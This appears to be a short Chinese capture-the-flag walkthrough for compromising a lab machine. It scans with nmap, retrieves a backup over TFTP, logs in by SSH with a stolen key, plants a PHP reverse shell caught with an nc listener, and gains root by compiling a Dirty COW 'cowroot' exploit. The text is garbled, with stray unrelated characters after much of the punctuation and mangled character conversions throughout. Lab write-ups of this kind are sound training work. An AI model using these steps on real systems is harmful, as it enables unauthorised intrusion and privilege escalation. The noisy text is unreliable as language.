廢話少說,直接開始晨汹!
$ sudo nmap -sS 172.16.89.130
瀏覽器打開網(wǎng)站發(fā)現(xiàn):(注意url)
繼續(xù)~~~~~~
$ tftp
tftp> connect 172.16.89.130
tftp> get /backups/backup.tar
Received 1824718 bytes in 0.9 seconds
tftp> quit
解壓后得到文件夾:home和var磷杏,進入home/paul/keys后
$ sudo ssh -i id_key4 paul@172.16.89.130
因為在網(wǎng)站上看到了admin登錄頁面土陪,現(xiàn)在看是否能寫入一個shell募闲,去下載shell文件
修改完shell里面的信息后,終端選擇Edit file堡僻,并且寫入文件shell.php,然后退出
$ nc -lvp 4444
瀏覽器打開剛才的shell.php
發(fā)現(xiàn)shell回彈
? cd到/home/paul目錄疫剃,發(fā)現(xiàn)文件.pdmenurc钉疫,聯(lián)想到在/etc/passwd文件見到過/home/paul/pdmenu這個路徑,那這個應(yīng)該就是ssh鏈接的時候的那個界面的配置文件巢价,但是現(xiàn)在用戶www-data沒有權(quán)限修改牲阁,因此再次回到ssh鏈接上修改。
之后退出壤躲,再一次ssh登錄城菊,發(fā)現(xiàn)多了shell:
點入后,可以看到用戶paul的shell碉克,去尋找exploit : exploit
建立一個新文件cowroot.c凌唬,并把代碼寫入。
依次執(zhí)行下面命令:
$ gcc cowroot.c -o cowroot -pthread
$ ./cowroot
bingo漏麦,flag獲得結(jié)束法瑟!